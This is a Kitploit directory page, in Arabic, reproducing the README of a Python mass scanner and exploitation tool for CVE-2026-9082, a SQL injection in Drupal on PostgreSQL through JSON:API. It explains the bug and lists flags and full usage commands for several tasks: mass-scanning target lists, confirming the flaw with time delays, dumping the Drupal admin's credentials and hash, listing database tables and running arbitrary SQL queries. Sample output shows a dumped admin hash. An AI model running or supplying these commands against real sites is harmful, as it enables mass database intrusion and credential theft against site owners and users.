Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
drupal-jsonapi-sqli-scanner — الماسح: CVE-2026-9082 Drupal PostgreSQL SQLi عبر JSON:API — ماسح ضوئي بلغة Python لثغرة SQLi غير مصادق عليها تؤدي إلى RCE (CISA KEV) | Kitploit
أدوات/GitHubGitHub/ridhinva/drupal-jsonapi-sqli-scanner
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتجمع المعلوماتاختبار الاختراقالفريق الأحمرأمن قواعد البيانات
GitHub
ridhinva/drupal-jsonapi-sqli-scanner

drupal-jsonapi-sqli-scanner

الماسح: CVE-2026-9082 Drupal PostgreSQL SQLi عبر JSON:API — ماسح ضوئي بلغة Python لثغرة SQLi غير مصادق عليها تؤدي إلى RCE (CISA KEV)

عرض المستودع
216منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-9082 Critical CISA KEV Affected Versions License

CVE-2026-9082 — حقن SQL في Drupal PostgreSQL

أداة المسح الجماعي والاستغلال

حقن SQL غير مصادق عليه في نواة Drupal (PostgreSQL)
حقن مفتاح مصفوفة JSON:API عبر إساءة استخدام اسم العنصر النائب في PDO


نظرة عامة

CVE-2026-9082 هو ثغرة حقن SQL بالغة الخطورة في نواة Drupal تؤثر على جميع المواقع التي تستخدم PostgreSQL وتعمل بـ Drupal 8.0 حتى 11.3.9. وقد أُضيف إلى كتالوج CISA للثغرات المستغلة المعروفة (KEV) بتاريخ 2026-05-22 — وهو يُستغل بنشاط في البرية.

التأثير

الخطورةCVSSالمصادقة المطلوبةمتجه الهجوم
حرجة9.8+غير مطلوبةHTTP (JSON:API)
  • استخراج البيانات — استخراج قواعد البيانات والمستخدمين وتجزئات كلمات المرور
  • تصعيد الامتيازات — إنشاء حسابات مسؤول وتعديل المحتوى
  • تنفيذ التعليمات البرمجية عن بُعد — في بعض التكوينات عبر pg_exec() أو COPY ... PROGRAM

الإصدارات المتأثرة

الحالةالإصدارات
❌ متأثرDrupal 8.0.0 → 11.3.9 (PostgreSQL backend)
✅ مُصلَّح11.3.10, 11.2.12, 10.6.9, 10.5.10

كيف يعمل

تكمن المشكلة في core/modules/pgsql/src/EntityQuery/Condition.php. تستخدم طريقة translateCondition() مفاتيح مصفوفة يتحكم بها المستخدم من معاملات فلاتر JSON:API لإنشاء أسماء العناصر النائبة في PDO. يقوم PDO بتحليل [a-zA-Z0-9_] فقط كأسماء عناصر نائبة، لذا فإن أي لاحقة بعد ) تتحول إلى SQL حرفي يُحقن في الاستعلام.

root@kitploit:~
JSON:API Filter → array key with SQL → PDO placeholder truncation → SQL injection

الميزات

  • ✅ ماسح جماعي — فحص مئات الأهداف بالتزامن
  • ✅ وضع الهدف المفرد — فحص مواقع Drupal فردية
  • ✅ كشف قائم على الزمن — تأكيد pg_sleep() لحقن SQL الأعمى
  • ✅ كشف قائم على القيم المنطقية — مقارنة عدد الصفوف
  • ✅ استخراج الإصدار — تحديد إصدار PostgreSQL
  • ✅ معلومات قاعدة البيانات — استخراج المستخدم الحالي واسم قاعدة البيانات
  • ✅ تفريغ بيانات اعتماد المسؤول — اسم المستخدم والبريد الإلكتروني وتجزئة كلمة المرور (uid=1)
  • ✅ سرد الجداول — تعداد جميع الجداول العامة
  • ✅ استعلامات SQL مخصصة — تنفيذ أي استعلام استخراج
  • ✅ دعم الوكيل — التوجيه عبر Burp Suite أو ما شابه
  • ✅ إخراج إلى ملف — حفظ نتائج الفحص الجماعي
  • ✅ مخرجات طرفية ملوّنة — سهولة قراءة النتائج

التثبيت

المتطلبات الأساسية

  • Python 3.8+
  • pip (مدير حزم Python)

تثبيت التبعيات

root@kitploit:~
# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082

# Install requirements
pip install requests

هذا كل شيء! تبعية واحدة فقط — requests.


الاستخدام

🕵️ فحص هدف واحد

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check

📡 فحص جماعي لأهداف متعددة

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt

صيغة targets.txt:

root@kitploit:~
https://target1.com
target2.com
192.168.1.100

🔓 استخراج إصدار PostgreSQL

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --version

🗄️ استخراج معلومات قاعدة البيانات

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo

👤 تفريغ بيانات اعتماد المسؤول (uid=1)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --admin

📋 سرد جميع الجداول

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --tables

💉 استعلام SQL مخصص

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"

حفظ النتائج في ملف

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt

استخدام وكيل (Burp Suite)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080

تخصيص التوقيت

root@kitploit:~
# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10

# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60

مرجع الأوامر

Flagالوصف
-u, --urlرابط الهدف المفرد
-f, --fileملف يحتوي على الأهداف (هدف واحد في كل سطر)
-o, --outputحفظ نتائج الفحص في ملف
--checkالتحقق مما إذا كان الهدف معرضًا للخطر
--versionاستخراج إصدار PostgreSQL
--dbinfoاستخراج مستخدم قاعدة البيانات واسمها
--adminاستخراج بيانات اعتماد مسؤول Drupal (uid=1)
--tablesسرد جميع جداول قاعدة البيانات
--queryاستعلام استخراج SQL مخصص
--threadsعدد الخيوط للفحص الجماعي (الافتراضي: 20)
--timeoutمهلة طلب HTTP (الافتراضي: 30 ثانية)
--delayتأخير pg_sleep للكشف (الافتراضي: 5 ثوانٍ)
--no-ssl-verifyتخطي التحقق من شهادة TLS
--proxyوكيل HTTP (مثل: http://127.0.0.1:8080)

مثال على المخرجات

هدف معرّض للخطر

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║          CVE-2026-9082 - Drupal PostgreSQL SQLi             ║
║       Mass Scanner + Exploitation Tool v1.0.0               ║
╚══════════════════════════════════════════════════════════════╝
  CISA KEV: Added 2026-05-22  |  Advisory: SA-CORE-2026-004

[*] Checking: https://vulnerable-drupal-site.com

[!!] VULNERABLE - https://vulnerable-drupal-site.com
      Method: time-based (+5.2s)
      Resource: node/article

تفريغ بيانات اعتماد المسؤول

root@kitploit:~
[+] username: admin
[+] email: [email protected]
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...

المراجع

المصدرالرابط
استشارة DrupalSA-CORE-2026-004
CISA KEVCVE-2026-9082
التزام الإصلاحea9524d9
إدخال NVDCVE-2026-9082
المكتشفMichael Maturi

⚠️ إخلاء مسؤولية

هذه الأداة مخصّصة لاختبارات الأمان المصرّح بها والأغراض التعليمية والبحث الأخلاقي فقط.

الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. لا يتحمل المؤلفون أي مسؤولية ولا يكونون مسؤولين عن أي إساءة استخدام أو ضرر يسببه هذا البرنامج.


المؤلف

Ridhin V A (@ridhinva) — صياد مكافآت الاختراق وباحث أمني

بُني لأن CISA KEV أشارت إلى أنه يُستغل في البرية. طبّق التصحيح على مواقع Drupal الخاصة بك.

تنزيل الأداة